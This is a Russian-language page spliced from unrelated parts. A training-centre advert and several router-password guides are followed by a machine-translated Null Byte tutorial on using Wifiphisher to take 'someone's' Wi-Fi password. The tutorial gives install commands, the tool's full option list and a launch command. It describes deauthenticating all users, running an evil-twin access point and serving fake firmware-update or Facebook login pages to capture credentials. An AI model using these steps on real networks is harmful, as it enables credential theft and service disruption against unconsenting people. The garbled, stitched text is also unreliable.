Мы принимаем к оплате:

«Подарочный сертификат» от нашего Учебного Центра – это лучший подарок для тех, кто Вам дорог! Оплате обучение и подарите Вашим родным и близким обучение по любому из курсов!!!

«Сертификат на повторное обучение» дает возможность повторно пройти обучение в нашем Учебном Центре со скидкой 1000 рублей!

А также:


Как установить пароль на вай фай роутер asus


Как поставить пароль на Wi-Fi на роутере ASUS

&nbsp Asus

В данной инструкции будет подробно описан процесс установки пароля на беспроводную сеть Wi-Fi на беспроводных маршрутизаторах ASUS. Руководство в равной степени подойдет почти для всех роутеров (потребительского сегмента), включая ASUS RT-G32, RT-N10 и N12, а также других популярных моделей (будут рассмотрены разные прошивки).

Защитив свою сеть паролем, вы не только избежите использования вашего доступа в Интернет посторонними лицами (и как следствие — падение скорости у вас), но также и более серьезных возможных последствий: например, если вы не особенно разбираетесь в сетевых настройках Windows, то может оказаться, что сосед будет копаться в ваших документах и фотографиях, а вы об этом не будете знать.

Вход в веб-интерфейс роутера

Первое, что нужно сделать — это зайти в настройки Wi-Fi роутера. Будет лучше, если установку пароля вы будете проводить с компьютера, который соединен проводом с устройством (но, можно и по Wi-Fi, я постараюсь учесть и описать возможные проблемы при данном варианте).

Запустите ваш браузер и введите в адресную строку 192.168.1.1 — это стандартный адрес для входа в настройки роутеров ASUS. Он также указан на наклейке с обратной стороны, так же там вы найдете логин и пароль для входа, обычно это adminи adminв обоих полях. (Если они не подходят, значит вы их изменяли при первоначальной настройке, выхода два — вспомнить или сбросить устройство в заводское состояние. Это не пароль на беспроводную сеть, а пароль для администрирования настроек Wi-Fi роутера).

Два варианта веб-интерфейса настройки роутеров Asus

После правильного ввода вы попадете в веб-интерфейс настроек, который может выглядеть, как показано на изображении выше. Если у вас ASUS RT-G32, вы, скорее всего, увидите вариант слева, на ASUS RT-N10 и RT-N12 — темный веб-интерфейс (хотя на более старых прошивках может быть и первый вариант). Процесс установки защиты на беспроводную сеть при этом не отличается.

Установка пароля на Wi-Fi ASUS

В веб-интерфейсе настроек роутера выберите в меню пункт «Беспроводная сеть», собственно все параметры устанавливаются здесь, в том числе и пароль на Wi-Fi сеть. На картинке выше показаны настройки на новом варианте прошивки, внизу будет скриншот со старым веб-интерфейсом настройки.

  1. В пункте SSID указывается общедоступное имя беспроводной сети, по которому вы идентифицируете свою сеть среди всех остальных. Не используйте кириллицу.
  2. Метод проверки подлинности (тип шифрования Wi-Fi) рекомендуется установить WPA2-Personal, как самый безопасный.
  3. Предварительный ключ WPA — это и есть пароль на Wi-Fi, введите желаемый, содержащий не менее 8 символов, не используйте кириллицу и специальные символы.

Нажмите «Применить» и дождитесь изменения параметров беспроводной сети.

Если при выполнении данных настроек вы были подключены к роутеру по беспроводному соединению, связь с ним разорвется и, возможно, в окне браузера вы увидите ошибку. Все, что нужно сделать — заново подключиться по Wi-Fi к роутеру ASUS, но уже с новыми параметрами.

Может быть полезным и интересным:

Как установить пароль в сети Wi-Fi

Wi-Fi есть везде, от вашего местного кафе Starbucks до вашего дома. Но хотя вам может понравиться удобство беспроводного подключения, вы определенно захотите найти время, чтобы защитить себя, установив пароль в своей сети. Пока вы это делаете, вы можете изменить свое сетевое имя на что-нибудь умное и остроумное, чтобы развлечь своих соседей. Но в любом случае вы также захотите обновить прошивку своего маршрутизатора. Эти два простых шага - просто здравый смысл, например, запирание входной двери на ночь; они основные средства защиты.

К счастью, изменить пароль роутера очень просто, и вы можете обновить прошивку прямо сейчас. Вам понадобится всего лишь пара ключевой информации, большая часть которой уже должна быть вам доступна. Настройка маршрутизатора будет отличаться от производителя к бренду и может отличаться от одной модели к другой. В случае сомнений поищите вспомогательные материалы для вашей марки и модели непосредственно у производителя. Мы собрали ссылки на страницы поддержки для некоторых из самых популярных брендов маршрутизаторов.

Также стоит отметить, что во многих новых маршрутизаторах вы также можете получить доступ к процессу установки и настройкам маршрутизатора через мобильное приложение. В некоторых случаях - например, с маршрутизаторами от Eero или Google - вам нужно будет использовать приложение, чтобы внести какие-либо изменения в маршрутизатор.

Для большинства маршрутизаторов, старых и новых, смена имени сети или пароля начинается с доступа к веб-интерфейсу маршрутизатора.

Подключение к маршрутизатору

Для этого вам сначала потребуется прямое подключение к маршрутизатору.Обычно это можно сделать через Wi-Fi, но для некоторых маршрутизаторов потребуется подключение к сети Ethernet.

Чтобы подключиться через Wi-Fi, начните с подключения к сети Wi-Fi, как обычно. Большинство маршрутизаторов имеют сетевое имя по умолчанию, которое включает в себя торговую марку маршрутизатора, а иногда и номер модели. Если вы не знаете сетевое имя своего маршрутизатора, обратитесь к документации, прилагаемой к устройству.

Если соединение Wi-Fi не может использоваться или недоступно, вам потребуется кабель Ethernet для проводного соединения.Подключите один конец кабеля к порту Ethernet вашего ПК, а другой конец - к маршрутизатору. Если на вашем компьютере нет порта Ethernet, вам понадобится адаптер USB-Ethernet.

Найти IP-адрес или веб-портал

После подключения к маршрутизатору (через Wi-Fi или Ethernet) вы будете использовать свой браузер (любой веб-браузер должен работать) для перехода к веб-интерфейсу маршрутизатора. На этой странице представлена ​​панель инструментов управления, позволяющая настроить ряд параметров маршрутизатора, включая пароль.

Бренд IP-адрес URL
Amplifi Только приложение
Asus 192.168.1.1 http://router.asus.com
Белкин 192.168.2. http: // router
D-Link 192.168.0.1 http: //mydlinkrouter.local
Eero Только приложение
Google Только приложение
Линксис 192.168.1.1 http: //myrouter.local
Netgear 192.168.0.1 http://www.routerlogin.net
TP-Link 192.168.1.1 http: / /tplinklogin.net или http://tplinkwifi.net

Для большинства этих маршрутизаторов вы сможете попасть туда, используя IP-адрес по умолчанию, обычно 192.168.0.1 или 192.168.1.1 . Просто введите IP-адрес в адресную строку.

Если вам удобнее использовать URL-адрес, проверьте адрес; производители часто предлагают веб-адреса для всех своих маршрутизаторов. Некоторые, такие как Belkin, требуют только ввести слово «маршрутизатор» в адресной строке, чтобы открыть настройки, но большинство из них будет больше похоже на стандартный адрес веб-сайта. И, как и при обычном просмотре веб-страниц, вам не нужно самостоятельно вводить часть http: //, поскольку она выполняется автоматически во всех текущих браузерах. Некоторые производители, такие как Netgear, часто предоставляют QR-код в дополнение к URL-адресу, чтобы помочь вам, если вы хотите управлять своим маршрутизатором со смартфона или планшета.

Вход в систему: имена пользователей и пароли по умолчанию

Большинство маршрутизаторов поставляются с уже существующими именами пользователей и паролями. Большинство учетных данных по умолчанию будут очень похожими; admin - наиболее распространенное имя пользователя, и большинство паролей по умолчанию: admin , default , 1234 или password .

Если один из этих стандартных паролей по умолчанию не работает, список значений по умолчанию, используемых производителем устройства, можно найти на страницах поддержки устройства или на таких сайтах, как RouterPasswords.com или Router-Reset.com.

Однако компании знают, что пароли по умолчанию представляют значительную угрозу безопасности; многие люди никогда не меняют свои пароли. Итак, некоторые компании поставляют маршрутизаторы с индивидуальными паролями администратора, которые обычно находятся на самом маршрутизаторе или включены в документацию по продукту. Например, маршрутизаторы Netgear обычно имеют наклейку на нижней части маршрутизатора, которая включает уникальную информацию для входа в систему и случайно сгенерированный пароль.

Использование веб-интерфейса

Большинство маршрутизаторов имеют веб-интерфейс для управления настройками и изменения учетных данных, но подключение к этим интерфейсам обычно является наиболее сложной частью.Вооружившись приведенной выше информацией, вы сможете легко переходить и входить в веб-интерфейс без особых проблем. После того, как вы вошли в систему, вам остается только найти правильное меню настроек.

Хотя особенности зависят от модели, вы обычно найдете параметры безопасности и пароли в меню «Настройки» или «Беспроводная сеть». Сменить пароль будет так же просто, как ввести имя пользователя и пароль по умолчанию, а затем ввести пароль, который вы хотите использовать.

Запуск с перезагрузкой

Если вы хотите изменить свое сетевое имя или пароль с того, который вы уже установили, следуйте приведенным выше инструкциям, но используйте свои индивидуальные учетные данные для входа в систему. Но что делать, если вы потеряли или забыли свой пароль?

Если вам удалось заблокировать доступ к веб-интерфейсу маршрутизатора, забыв пароль, надежда еще есть. Вы можете выполнить полный сброс маршрутизатора, удалив все измененные настройки и обновления, которые вы установили, и вернув устройство к заводским настройкам.

Выполнить полный сброс очень просто, потому что на большинстве маршрутизаторов есть специальная кнопка для выполнения этой задачи. Кнопка сброса представляет собой небольшую утопленную кнопку, расположенную на задней или нижней части маршрутизатора, обычно рядом с разъемом питания. Он сделан так, что вы не нажмете его случайно, а это означает, что вам нужно будет использовать скрепку или что-то подобное, чтобы нажать кнопку. Нажмите и удерживайте в течение 10 секунд, и вы сможете начать все заново, как если бы ваш маршрутизатор был только что с завода.

Обновите прошивку перед тем, как начать

После обновления имени сети и пароля вам также следует потратить время на обновление прошивки. Производители регулярно выпускают исправления и обновления прошивки для противодействия новым угрозам и решения проблем, о которых не было известно на момент первого выпуска маршрутизатора. Без обновления вы можете оставить свой маршрутизатор открытым для серьезных уязвимостей, которые могут поставить под угрозу подключенные устройства по всему дому, от ноутбуков и телефонов до телевизоров и камер видеонаблюдения.

В большинстве веб-интерфейсов есть возможность обновления прошивки, которую относительно легко найти, обычно в таких меню, как «Настройки маршрутизатора», «Администрирование» или «Дополнительно». Если у вас возникли проблемы с поиском варианта обновления прошивки, проверьте страницу поддержки поставщика. Вы не только сможете найти руководство по навигации по веб-интерфейсу маршрутизатора, вам может потребоваться загрузить файл обновления прямо со страницы поддержки. Вы также можете ознакомиться с нашим руководством по обновлению прошивки с инструкциями для каждого производителя.

После того, как вы нашли возможность обновить прошивку, обычно остается просто выбрать ее, пройти через пару подсказок, чтобы начать обновление, а затем дождаться загрузки и установки исправлений.

.

Как изменить пароль WiFi на вашем беспроводном маршрутизаторе [Полное руководство]

WhatsaByte может получать долю от продаж или другую компенсацию по ссылкам на этой странице.

Хотите узнать, как изменить пароль Wi-Fi на беспроводном маршрутизаторе с компьютера или смартфона?

В этом руководстве я собираюсь поделиться с вами методами, которые вы можете использовать для изменения пароля по умолчанию для вашей сети.

Большинство из нас знакомы с нашей беспроводной сетью и часто используют ее ежедневно дома или в офисе.Если вы хотите защитить свою беспроводную сеть, необходимо установить пароль, чтобы предотвратить доступ к ней неавторизованных пользователей. Таким образом, только пользователи с правильным сетевым паролем могут получить доступ к сети и использовать Интернет.

К сожалению, некоторым из вас потребуется сменить пароль Wi-Fi, потому что вы его забыли или поделились им с некоторыми людьми, которым вы больше не хотите иметь к нему доступ.

Таким образом, я написал это руководство, чтобы помочь вам узнать, как изменить пароль Wi-Fi в вашей сети Wi-Fi, независимо от того, какая это модель или какое устройство вы используете.


Как изменить пароль WiFi на беспроводном маршрутизаторе

Сменить пароль WiFi не так сложно, как вы думали. Это довольно просто, если вы знаете, что делать.

Вот и все!

Однако все становится сложнее, если вы не знаете одну из этих важных деталей, особенно имя пользователя и пароль администратора вашего маршрутизатора. В этом случае вам необходимо сбросить настройки маршрутизатора, использовать имя пользователя и пароль маршрутизатора по умолчанию, а затем настроить его с самого начала.

Теперь давайте начнем с первого шага, чтобы изменить пароль WiFi на вашем маршрутизаторе.


1. Узнайте модель вашего беспроводного маршрутизатора

Определение номера модели вашего беспроводного маршрутизатора поможет упростить поиск имени пользователя и пароля администратора по умолчанию. Чтобы найти модель, посмотрите на заднюю часть вашего беспроводного маршрутизатора, где должна быть этикетка с подробной информацией.

На основе этих данных вы можете легко узнать имя пользователя и пароль администратора по умолчанию для вашего беспроводного маршрутизатора, если вы не знаете.

Как я могу узнать имя пользователя и пароль по умолчанию для моего беспроводного маршрутизатора?

Не знаете имя пользователя и пароль администратора беспроводного маршрутизатора? Если вы еще не изменили его, его довольно легко найти в Google.

Вы можете найти его, выполнив один из следующих условий поиска:

  • «имя пользователя и пароль по умолчанию для [модель-беспроводного маршрутизатора-здесь]»
  • «имя пользователя и пароль по умолчанию для [беспроводной-маршрутизатор- модель-здесь] »
  • « имя пользователя и пароль по умолчанию для [название-бренда-беспроводного маршрутизатора-здесь] »
  • « имя пользователя и пароль по умолчанию для [здесь-бренда-беспроводного-маршрутизатора] »

Вместо поискав в Интернете, вы можете найти эту информацию в документе, который прилагается к маршрутизатору при его покупке.Если у вас его больше нет, тогда поиск - единственный вариант.

В случае, если вы изменили имя пользователя и пароль администратора беспроводного маршрутизатора, а теперь забыли его, единственный вариант, который вы можете использовать, - это сбросить настройки беспроводной сети.

На задней панели маршрутизатора должна быть небольшая кнопка, которую вы можете нажать и удерживать в течение нескольких секунд, чтобы восстановить настройки по умолчанию. К сожалению, сброс настроек маршрутизатора приведет к удалению всех добавленных вами настроек. Таким образом, вам нужно будет настроить его с самого начала.

См. Также: , как изменить имя сети WiFi


2. Определите IP-адрес вашего беспроводного маршрутизатора

Обычно IP-адрес беспроводного маршрутизатора по умолчанию должен быть 192.168.0.1 или 192.168. 1.1, если вы еще не изменили его. Чтобы получить доступ к маршрутизатору, введите этот IP-адрес в адресную строку веб-браузера и нажмите Введите .

Затем вы должны предоставить имя пользователя и пароль вашего маршрутизатора для доступа к нему.

Однако, если вы не можете получить доступ к маршрутизатору с этими IP-адресами, есть несколько других методов, которые вы можете использовать для его определения:

Определение вашего IP-адреса в Microsoft Windows

Чтобы узнать IP-адрес маршрутизатор в Windows, нажмите Windows + X , затем нажмите клавишу C , чтобы запустить командную строку . В приложении выполните следующую команду:

ipconfig / all

Он покажет вам все сведения о вашем сетевом адаптере, включая IP-адрес, который использует ваш беспроводной маршрутизатор.

Определение вашего IP-адреса в Mac OS Apple

Запустите Системные настройки из меню Apple, а затем нажмите на параметр «Сеть» в разделе «Интернет и беспроводная связь».

На следующем шаге выберите Wi-Fi -> Дополнительно -> TCP / IP, и вы увидите IP-адрес вашего беспроводного маршрутизатора прямо здесь.

Определение вашего IP-адреса на Android-устройстве Google

Перейдите в «Настройки» -> «Управление беспроводной связью» -> «Wi-Fi». После этого нажмите на беспроводную сеть, к которой вы подключаетесь.Появится новое всплывающее окно со всеми подробностями, включая статус сети, мощность сигнала, IP-адрес, IP-адрес маршрутизатора, а также тип безопасности.

Определение вашего IP-адреса в iOS от Apple

Щелкните приложение «Настройки», перейдите в Wi-Fi и щелкните значок (i)

, чтобы просмотреть подробную информацию о беспроводной сети, к которой вы подключаетесь.

Будет поле с именем «Маршрутизатор», в котором будет указан IP-адрес, который вы ищете.

Вам следует знать одну вещь: вы можете обнаружить этот IP-адрес, только если вы уже подключены к беспроводной сети.


3. Измените пароль WiFi на вашем беспроводном маршрутизаторе

После входа в свой WiFi-маршрутизатор найдите раздел «Беспроводная связь» или что-то подобное. Должен быть раздел «Настройки безопасности», где вы можете изменить пароль WiFi вашей беспроводной сети.

Расположение этого раздела будет отличаться в зависимости от марки или прошивки вашего маршрутизатора. Однако я уверен, что выяснить это несложно.

Например, вот как выглядит раздел беспроводной безопасности в прошивке Tomato:

Или в прошивке DD-WRT:

После того, как вы найдете этот раздел, введите желаемый пароль и нажмите на Кнопка «Сохранить» или «Применить изменения» в зависимости от модели.


4. Перезагрузите беспроводной маршрутизатор

После изменения пароля беспроводной сети необходимо перезапустить маршрутизатор, чтобы изменения вступили в силу. На панели управления маршрутизатора должна быть опция для перезагрузки беспроводного маршрутизатора.

Если вы не можете его найти, также можно отсоединить кабель питания, а затем снова подключить.

Помимо изменения пароля WiFi, вы также должны защитить свою беспроводную сеть, чтобы защитить себя от сетевых угроз.Вот пять простых советов по защите вашей сети Wi-Fi за считанные минуты.

Взгляните на это!

.

Получите чей-либо пароль Wi-Fi без взлома с помощью Wifiphisher «Null Byte :: WonderHowTo

В то время как взлом пароля и атаки PIN-кода установки WPS привлекают много внимания, атаки социальной инженерии - безусловно, самый быстрый способ получения пароля Wi-Fi. Одной из самых мощных атак социальной инженерии Wi-Fi является Wifiphisher, инструмент, который блокирует Интернет до тех пор, пока отчаявшиеся пользователи не вводят пароль Wi-Fi, чтобы включить обновление прошивки поддельного маршрутизатора.

Атаки социальной инженерии являются мощными, потому что они часто полностью обходят защиту.Если вы можете обманом заставить сотрудника ввести пароль на поддельную страницу входа в систему, не имеет значения, насколько надежен пароль. Это противоположно атакам взлома, когда вы используете вычислительную мощность компьютера, чтобы быстро попробовать гигантский список паролей. Но вы не сможете добиться успеха, если пароль, который вы атакуете, безопасен и не включен в ваш список паролей.

Незнание того, насколько надежен пароль, который вы атакуете, может расстраивать, потому что если вы потратите время и вычислительную мощность, необходимые для атаки по словарю или грубой силы, то это может показаться пустой тратой ресурсов.Вместо этого такие инструменты, как Wifiphisher, задают вопросы о людях, стоящих за этими сетями.

Знает ли средний пользователь, как выглядит страница входа в систему его Wi-Fi роутера? Заметили бы они, если бы все было иначе? Что еще более важно, будет ли занятый пользователь, отключенный от Интернета и находящийся в состоянии стресса из-за сбоя, по-прежнему будет вводить свой пароль, чтобы включить поддельное обновление, даже если они заметят, что страница входа выглядит немного иначе?

Вифифишер считает, что ответ - «да». Инструмент может выбрать любую ближайшую сеть Wi-Fi, деаутентифицировать всех пользователей (заблокировать ее) и создать клонированную точку доступа, для присоединения которой не требуется пароль.Любой пользователь, который подключается к открытой сети, похожей на злого двойника, получает убедительно выглядящую фишинговую страницу, требующую пароль Wi-Fi для включения обновления прошивки, что объясняется как причина, по которой Wi-Fi перестал работать.

Обновление прошивки от ада

Для цели атаки социальной инженерии первые признаки Wifiphisher выглядят как проблема с маршрутизатором. Сначала отключается Wi-Fi. Они по-прежнему видят сеть, но все попытки подключиться к ней сразу же терпят неудачу.Другие устройства также не могут подключиться к сети, и они начинают замечать, что не только одно устройство, но и каждое устройство Wi-Fi потеряло соединение с сетью.

Вот когда они замечают новую сеть с тем же именем, что и старая сеть, но не требующая пароля. После еще нескольких попыток присоединиться к защищенной сети они присоединяются к открытой сети из опасений, что их маршрутизатор внезапно транслирует сеть без пароля, к которой может присоединиться любой желающий. Как только они присоединяются, открывается официальная веб-страница с упоминанием производителя их маршрутизатора и информирует их о том, что маршрутизатор подвергается критическому обновлению прошивки.Пока они не введут пароль для применения обновления, интернет не будет работать.

После ввода сверхзащищенного пароля Wi-Fi экран загрузки начинает ползать по экрану при перезапуске маршрутизатора, и они немного гордятся тем, что серьезно относятся к безопасности своего маршрутизатора, установив это критическое обновление. Через минуту ожидания их устройства повторно подключаются к сети, теперь они более безопасны благодаря установленному обновлению.

Easy Access with Bossy Update

Для хакера получить пароли так же просто, как выбрать, на какую сеть вы хотите нацелить.После определения цели Wifiphisher немедленно блокирует все устройства, подключенные к сети, увеличивая вероятность того, что кто-то, подключенный к сети, расстроится и применит поддельное обновление. Затем информация о сети клонируется, и ложная сеть Wi-Fi транслируется, чтобы цель думала, что их маршрутизатор работает в каком-то неопределенном режиме обновления.

Устройства, подключающиеся к сети, сразу же заносятся в список, а фишинговая страница настраивается на соответствие производителю маршрутизатора путем считывания первой части MAC-адреса маршрутизатора.После обмана любой из целей, подключенных к целевой сети, для ввода пароля, Wifiphisher информирует хакера, пока не торопится. После отправки захваченного пароля цель жестоко занята как фальшивым экраном загрузки обновлений, так и фальшивым таймером перезагрузки, чтобы выиграть время для хакера, чтобы проверить захваченный пароль.

Что вам понадобится

Чтобы эта атака сработала, вам понадобится совместимый с Kali Linux адаптер беспроводной сети. Если вы не уверены, что выбрать, ознакомьтесь с одним из наших руководств по выбору того, которое поддерживает режим монитора и внедрение пакетов, по ссылке ниже.

Слева направо, начиная сверху: Alfa AWUS036NH; Альфа AWUS051NH; TP-LINK TL-WN722N; Альфа AWUS036NEH; Panda PAU05; Alfa AWUS036H; Альфа AWUS036NHA. Изображение от Kody / Null Byte

Помимо хорошего беспроводного сетевого адаптера, вам понадобится компьютер под управлением Kali Linux, который вы должны сначала обновить, запустив apt update и apt upgrade . Если вы этого не сделаете, вы, скорее всего, столкнетесь с проблемами в процессе установки Wifiphisher ниже.

Шаг 1. Установка Wifiphisher

Для начала мы можем открыть окно терминала и ввести apt install wifiphisher , чтобы установить Wifiphisher.

  ~ # apt install wifiphisher Чтение списков пакетов ... Готово Построение дерева зависимостей Чтение информации о состоянии ... Готово wifiphisher - это уже самая новая версия (1.4 + git20191215-0kali1). Следующие пакеты были установлены автоматически и больше не требуются: dh-python libdouble-conversion1 liblinear3 Используйте 'apt autoremove', чтобы удалить их. 0 обновлено, 0 установлено заново, 0 удалено и 1891 не обновлено.  

Если вы хотите попробовать установить его из репозитория GitHub, вы можете сделать это, клонировав репозиторий и следуя инструкциям на странице GitHub, например:

  ~ # git clone https: // github.com / wifiphisher / wifiphisher.git ~ # cd wifiphisher ~ # sudo python setup.py install  

Это должно установить Wifiphisher, который с этого момента вы можете начать, просто введя имя программы в окне терминала.

Шаг 2. Просмотрите флаги Wifiphisher

У вас должна быть возможность запустить сценарий в любое время, просто набрав sudo wifiphisher в окне терминала. Хотя у Wifiphisher нет справочной страницы, вы можете увидеть на его странице --help , что у него есть довольно внушительный список параметров конфигурации, которые вы можете изменить, добавив к команде различные флаги.

  ~ # wifiphisher --help использование: wifiphisher [-h] [-i ИНТЕРФЕЙС] [-eI EXTENSIONSINTERFACE] [-aI АПИНТЕРФЕЙС] [-iI ИНТЕРНЕТИНТЕРФЕЙС] [-iAM MAC_AP_INTERFACE] [-iEM MAC_EXTENSIONS_INTERFACE] [-iNM] [-kN] [-nE] [-nD] [-dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]] [-e ESSID] [-dE DEAUTH_ESSID] [-p PHISHINGSCENARIO] [-pK PRESHAREDKEY] [-hC HANDSHAKE_CAPTURE] [-qS] [-lC] [-lE LURE10_EXPLOIT] [--logging] [-dK] [-lP LOGPATH] [-cP CREDENTIAL_LOG_PATH] [--payload-path PAYLOAD_PATH] [-cM] [-wP] [-wAI WPSPBC_ASSOC_INTERFACE] [-kB] [-fH] [-pPD PHISHING_PAGES_DIRECTORY] [--dnsmasq-conf DNSMASQ_CONF] [-pE PHISHING_ESSID] необязательные аргументы: -h, --help показать это справочное сообщение и выйти -i ИНТЕРФЕЙС, --interface ИНТЕРФЕЙС Вручную выберите интерфейс, поддерживающий как AP, так и режимы мониторинга для создания мошеннической точки доступа, а также проведение дополнительных атак Wi-Fi от расширений (я.е. деаутентификация). Пример: -i wlan1 -eI EXTENSIONSINTERFACE, --extensionsinterface EXTENSIONSINTERFACE Вручную выберите интерфейс, поддерживающий монитор режим деаутентификации жертв. Пример: -eI wlan1 -aI APINTERFACE, --apinterface APINTERFACE Вручную выберите интерфейс, поддерживающий режим AP для порождает мошенническую AP. Пример: -aI wlan0 -iI ИНТЕРНЕТИНТЕРФЕЙС, --интернет-интерфейс ИНТЕРНЕТИНТЕРФЕЙС Выберите интерфейс, подключенный к Интернет Пример: -iI ppp0 -iAM MAC_AP_INTERFACE, --mac-ap-interface MAC_AP_INTERFACE Укажите MAC-адрес интерфейса AP -iEM MAC_EXTENSIONS_INTERFACE, --mac-extensions-interface MAC_EXTENSIONS_INTERFACE Укажите MAC-адрес интерфейса расширений -iNM, --no-mac-randomization Не меняйте MAC-адрес -kN, --keepnetworkmanager Не убивайте NetworkManager -nE, --noextensions Не загружать расширения.-nD, --nodeauth Пропустить этап деаутентификации. -dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...], --deauth-channels DEAUTH_CHANNELS [DEAUTH_CHANNELS ...] Каналы на деаутентификацию. Пример: --deauth-channels 1,3,7 -e ESSID, --essid ESSID Введите ESSID мошеннической точки доступа. Этот вариант пропустит этап выбора точки доступа. Пример: --essid «Бесплатный Wi-Fi» -dE DEAUTH_ESSID, --deauth-essid DEAUTH_ESSID Деаутентифицируйте все BSSID в WLAN с этим ESSID.-p PHISHINGSCENARIO, --phishingscenario PHISHINGSCENARIO Выберите сценарий фишинга для запуска. пропустить этап выбора сценария. Пример: -p Обновление прошивки -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY Добавьте защиту WPA / WPA2 на несанкционированную точку доступа. Пример: -pK s3cr3tp4ssw0rd -hC HANDSHAKE_CAPTURE, --handshake-capture HANDSHAKE_CAPTURE Захват рукопожатий WPA / WPA2 для проверки пароль Пример: -hC capture.pcap -qS, --quitonsuccess Остановить скрипт после успешного получения одной пары полномочий -lC, --lure10-capture Захват BSSID обнаруженных точек доступа на этапе выбора точки доступа. Эта опция является частью Lure10 атака. -lE LURE10_EXPLOIT, --lure10-exploit LURE10_EXPLOIT Обманите службу определения местоположения Windows в соседней Windows пользователи считают, что он находится в области, которая была ранее был записан с помощью --lure10-capture.Часть Lure10 атака. - ведение журнала активности в файл -dK, --disable-karma Отключает атаку KARMA -lP LOGPATH, --logpath LOGPATH Определите полный путь к файлу журнала. -cP CREDENTIAL_LOG_PATH, --credential-log-path CREDENTIAL_LOG_PATH Определите полный путь к файлу, который будет хранить любые захваченные учетные данные --payload-путь PAYLOAD_PATH Путь полезной нагрузки для сценариев, обслуживающих полезную нагрузку -cM, --channel-monitor Следите за тем, чтобы целевая точка доступа меняла канал.-wP, --wps-pbc Следить за тем, чтобы кнопка на регистраторе WPS-PBC нажал. -wAI WPSPBC_ASSOC_INTERFACE, --wpspbc-assoc-interface WPSPBC_ASSOC_INTERFACE Интерфейс WLAN, используемый для подключения к WPS. Точка доступа. -kB, --known-beacons Транслировать рекламные кадры ряда маяков популярные WLAN -fH, --force-hostapd Принудительно использовать hostapd, установленный в системе -pPD PHISHING_PAGES_DIRECTORY, --phishing-pages-directory PHISHING_PAGES_DIRECTORY Искать фишинговые страницы в этом месте --dnsmasq-conf DNSMASQ_CONF Определите полный путь к настраиваемому dnmasq.conf файл -pE PHISHING_ESSID, --phishing-essid PHISHING_ESSID Определите ESSID, который вы хотите использовать для фишинга стр.  

Шаг 3. Подключите адаптер беспроводной сети

Теперь пора подготовить адаптер беспроводной сети, подключив его. Wifiphisher переведет вашу карту в режим беспроводного мониторинга, если вы этого не сделаете сами.

Хороший адаптер дальнего действия на Amazon: USB-адаптер Alfa AWUS036NHA Wireless B / G / N - 802.11n - 150 Мбит / с - 2,4 ГГц - 5 дБи Антенна

Шаг 4: Запуск сценария

Я собираюсь использовать свой беспроводной сетевой адаптер USB, поэтому я добавлю к команде флаг -i и добавьте имя моего сетевого адаптера. Если я этого не сделаю, Wifiphisher просто возьмет любой сетевой адаптер, какой сможет.

Чтобы запустить сценарий, я выполню следующую команду.

  ~ # wifiphisher -i wlan1  

После этого мы должны увидеть страницу со всеми ближайшими сетями.Здесь мы можем выбрать, какую сеть мы хотим атаковать, и нажать Введите .

  Опции: [Esc] Выйти [Стрелка вверх] Переместить вверх [Стрелка вниз] Переместить вниз ESSID BSSID CH PWR ENCR КЛИЕНТЫ ВЕНДОР _________________________________________________________________________________________ │ Группа исследователей CIC.m ██████████████ ███ 100% ОТКРЫТО 0 Неизвестно │ │ ██████████████ ██████████████ ███ 100% WPA2 2 Belkin International │ │ █████████████ ██████████████ ███ 98% WPA2 0 Неизвестно │ │ █████████████████ ██████████████ ███ 94% WPA2 6 Arris Group │ │ ████████████ ██████████████ ███ 86% WPA2 / WPS 1 Неизвестно │ │ █████████████ ██████████████ ███ 78% WPA2 / WPS 3 Belkin International │ │ ███████████ ██████████████ ███ 78% WPA2 / WPS 0 Asustek Computer │ │ ████████████ ██████████████ ███ 78% WPA2 / WPS 4 Hon Hai Precision Ind.│ │ █████████████████ ██████████████ ███ 74% WPA2 / WPS 0 Hon Hai Precision Ind. │ │ ████████████ ██████████████ ███ 74% WPA2 0 Неизвестно │ │ █████████████ ██████████████ ███ 74% WPA2 / WPS 2 Technicolor CH USA │ │ ████████████ ██████████████ ███ 70% WPA2 / WPS 1 Technicolor CH USA │ │ ███████████ ██████████████ ███ 70% WPA2 0 Неизвестно │ │ █████████████ ██████████████ ███ 90% WPA2 0 Неизвестно │ │ ████████████ ██████████████ ███ 66% WPA2 0 Неизвестно │ │ ████████████ ██████████████ ███ 66% WPA2 / WPS 0 Hon Hai Precision Ind.│ │ ████████████ ██████████████ ███ 62% WPA2 / WPS 2 Asustek Computer │ │ ███████████████ ██████████████ ███ 62% WPA2 / WPS 3 Неизвестно │ │ █████████████ ██████████████ ███ 62% WPA2 / WPS 0 Hon Hai Precision Ind. │ │ ████████████ ██████████████ ███ 58% WPA2 / WPS 0 Hon Hai Precision Ind. │ │ █████████████ ██████████████ ███ 58% WPA2 / WPS 0 Неизвестно │ │ ████████████████ ██████████████ ███ 58% WPA2 0 Неизвестно │ │ █████████████ ██████████████ ███ 58% WPA2 / WPS 0 Hon Hai Precision Ind.│ │ ██████████ ██████████████ ███ 54% WPA2 / WPS 0 Группа Arris │ │ ██████████ ██████████████ ███ 46% WPA2 0 Технологии Tp-link │ │ █████████████████ ██████████████ ███ 46% WPA2 / WPS 0 Asustek Computer │ ———————————————————————————————————————————————— ———————————————————————————————————————  

Далее скрипт спросит, какая атака ты хочешь бежать. Выберите вариант 2.

  Параметры: [Esc] Выйти [Стрелка вверх] Переместить вверх [Стрелка вниз] Переместить вниз Доступные сценарии фишинга: 1 - Network Manager Connect Имитирует поведение сетевого администратора.Этот шаблон показывает страницу Chrome «Сбой подключения» и отображает окно диспетчера сети через страницу с запросом предварительного общего ключа. В настоящее время поддерживаются сетевые диспетчеры Windows и MAC OS. 2 - Страница обновления прошивки Страница конфигурации маршрутизатора без логотипов или брендов, запрашивающая пароль WPA / WPA2 из-за обновления прошивки. Подходит для мобильных устройств. 3 - Страница входа в OAuth Бесплатная служба Wi-Fi, запрашивающая учетные данные Facebook для аутентификации с помощью OAuth. 4 - Обновление плагина браузера Общая страница обновления подключаемого модуля браузера, которую можно использовать для предоставления полезных данных жертвам. 

После выбора атаки сразу запустится. Откроется страница для отслеживания целей, присоединяющихся к сети. Wifiphisher также будет прослушивать устройства, пытающиеся подключиться к сетям, которых нет, и будет создавать поддельные версии, чтобы заманить эти устройства для подключения.

  Канал расширений: │ Wifiphisher 1.4GIT DEAUTH / DISAS - ██████████████████ │ ESSID: DEAUTH / DISAS - ██████████████████ │ Канал: 11 │ Интерфейс AP: wlan1 │ Варианты: [ESC] Выйти │ _________________________ Связанные жертвы: Запросы HTTPS:  

